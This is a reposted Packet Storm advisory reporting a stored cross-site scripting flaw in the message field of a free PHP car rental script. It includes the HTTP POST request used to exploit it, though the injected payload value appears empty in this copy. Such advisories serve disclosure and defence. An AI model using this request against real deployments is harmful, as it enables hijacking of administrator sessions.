Car Rental Script Cross Site Scripting ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on August 14th, 2020 📆 | 4961 Views ⚑

0

Car Rental Script Cross Site Scripting ≈ Packet Storm

[*]====================================================================[*]Car Rental Script – Stored XSS[*]====================================================================[*]####################################################################[*].:. Author : Yussef Dajdaj[*].:. Contact :[*].:. Vendor : https://projectworlds.in/[*].:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/[*].:. Date: : 8/7/2020[*].:. Tested on: : Tested on: Window 10 64 bit environment || XAMPP[*]####################################################################

Description: The application allows an anthenticated user to send a msg to the app administrator, parameter message is vulnerable to XSS injections.

===[ Exploit ]===

[*] Stored Cross Site Scripting[*]=================================

I. Persistent XSS

POST /testing/message_admin.php HTTP/1.1[*]Host: localhost[*]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30[*]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[*]Accept-Language: en-US,en;q=0.5[*]Accept-Encoding: gzip, deflate[*]Referer: https://localhost/testing/message_admin.php[*]Content-Type: application/x-www-form-urlencoded[*]Content-Length: 37[*]Cookie: PHPSESSID=noml4n6pvqi6tn83i8quqebtva[*]Connection: close[*]Upgrade-Insecure-Requests: 1

message=&send=Send+Message

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...